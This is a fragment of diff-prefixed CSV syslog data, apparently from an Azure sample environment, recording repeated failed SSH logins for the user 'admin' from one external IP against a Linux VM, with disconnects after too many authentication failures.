+1556,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:11,UbuntuDevEnv,2019-06-28 04:46:10,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 9537 ssh2,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9537,,
+1557,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:11,UbuntuDevEnv,2019-06-28 04:46:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1558,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:13,UbuntuDevEnv,2019-06-28 04:46:12,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 9537 ssh2,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9537,,
+1559,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:15,UbuntuDevEnv,2019-06-28 04:46:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1560,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:17,UbuntuDevEnv,2019-06-28 04:46:16,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 9537 ssh2,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9537,,
+1561,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:17,UbuntuDevEnv,2019-06-28 04:46:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1562,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:19,UbuntuDevEnv,2019-06-28 04:46:18,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 9537 ssh2,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9537,,
+1563,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:19,UbuntuDevEnv,2019-06-28 04:46:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1564,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:22,UbuntuDevEnv,2019-06-28 04:46:21,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 9537 ssh2,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9537,,
+1565,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:22,UbuntuDevEnv,2019-06-28 04:46:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1566,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:24,UbuntuDevEnv,2019-06-28 04:46:24,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 193.201.224.232 port 9537: Too many authentication failures [preauth],86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9537,,
+1567,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:24,UbuntuDevEnv,2019-06-28 04:46:24,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1568,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:24,UbuntuDevEnv,2019-06-28 04:46:24,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 193.201.224.232 port 9537 ssh2 [preauth],86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9537,,
+1569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:24,UbuntuDevEnv,2019-06-28 04:46:24,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 9537 ssh2,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,9537,,
+1570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:24,UbuntuDevEnv,2019-06-28 04:46:24,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,86549,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:29,UbuntuDevEnv,2019-06-28 04:46:28,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 6916,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,6916,,
+1572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:29,UbuntuDevEnv,2019-06-28 04:46:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:29,UbuntuDevEnv,2019-06-28 04:46:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:31,UbuntuDevEnv,2019-06-28 04:46:30,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 6916 ssh2,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,6916,,
+1575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:31,UbuntuDevEnv,2019-06-28 04:46:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:33,UbuntuDevEnv,2019-06-28 04:46:32,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 6916 ssh2,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,6916,,
+1577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:33,UbuntuDevEnv,2019-06-28 04:46:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:35,UbuntuDevEnv,2019-06-28 04:46:35,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 6916 ssh2,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,6916,,
+1579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:36,UbuntuDevEnv,2019-06-28 04:46:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:38,UbuntuDevEnv,2019-06-28 04:46:37,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 6916 ssh2,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,6916,,
+1581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:38,UbuntuDevEnv,2019-06-28 04:46:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:40,UbuntuDevEnv,2019-06-28 04:46:39,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 6916 ssh2,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,6916,,
+1583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:41,UbuntuDevEnv,2019-06-28 04:46:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:43,UbuntuDevEnv,2019-06-28 04:46:42,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 193.201.224.232 port 6916: Too many authentication failures [preauth],86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,6916,,
+1585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:43,UbuntuDevEnv,2019-06-28 04:46:42,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:43,UbuntuDevEnv,2019-06-28 04:46:42,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:43,UbuntuDevEnv,2019-06-28 04:46:42,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 193.201.224.232 port 6916 ssh2 [preauth],86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,6916,,
+1588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:46:43,UbuntuDevEnv,2019-06-28 04:46:42,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 6916 ssh2,86651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,6916,,
+1589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:02,UbuntuDevEnv,2019-06-28 04:47:02,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 11881,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11881,,
+1590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:02,UbuntuDevEnv,2019-06-28 04:47:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:02,UbuntuDevEnv,2019-06-28 04:47:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:04,UbuntuDevEnv,2019-06-28 04:47:03,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 11881 ssh2,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11881,,
+1593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:04,UbuntuDevEnv,2019-06-28 04:47:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:06,UbuntuDevEnv,2019-06-28 04:47:05,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 11881 ssh2,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11881,,
+1595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:06,UbuntuDevEnv,2019-06-28 04:47:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:07,UbuntuDevEnv,2019-06-28 04:47:07,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 11881 ssh2,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11881,,
+1597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:09,UbuntuDevEnv,2019-06-28 04:47:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:11,UbuntuDevEnv,2019-06-28 04:47:10,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 11881 ssh2,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11881,,
+1599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:11,UbuntuDevEnv,2019-06-28 04:47:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:13,UbuntuDevEnv,2019-06-28 04:47:13,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 11881 ssh2,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11881,,
+1601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:13,UbuntuDevEnv,2019-06-28 04:47:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:15,UbuntuDevEnv,2019-06-28 04:47:15,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 11881 ssh2,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11881,,
+1603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:15,UbuntuDevEnv,2019-06-28 04:47:15,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+1604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:15,UbuntuDevEnv,2019-06-28 04:47:15,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user admin from 193.201.224.232 port 11881 ssh2 [preauth],86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11881,,
+1605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:15,UbuntuDevEnv,2019-06-28 04:47:15,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:15,UbuntuDevEnv,2019-06-28 04:47:15,auth,UbuntuDevEnv,info,Disconnecting invalid user admin 193.201.224.232 port 11881: Too many authentication failures [preauth],86751,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,11881,,
+1607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:16,UbuntuDevEnv,2019-06-28 04:47:16,auth,UbuntuDevEnv,info,Invalid user admin from 193.201.224.232 port 26785,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,26785,,
+1608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:16,UbuntuDevEnv,2019-06-28 04:47:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+1609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:16,UbuntuDevEnv,2019-06-28 04:47:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:18,UbuntuDevEnv,2019-06-28 04:47:17,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 26785 ssh2,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,26785,,
+1611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:23,UbuntuDevEnv,2019-06-28 04:47:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:25,UbuntuDevEnv,2019-06-28 04:47:24,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 26785 ssh2,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,26785,,
+1613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:33,UbuntuDevEnv,2019-06-28 04:47:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:34,UbuntuDevEnv,2019-06-28 04:47:34,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 26785 ssh2,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,26785,,
+1615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:35,UbuntuDevEnv,2019-06-28 04:47:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+1616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 04:47:37,UbuntuDevEnv,2019-06-28 04:47:37,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 193.201.224.232 port 26785 ssh2,86834,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,193.201.224.2,26785,,
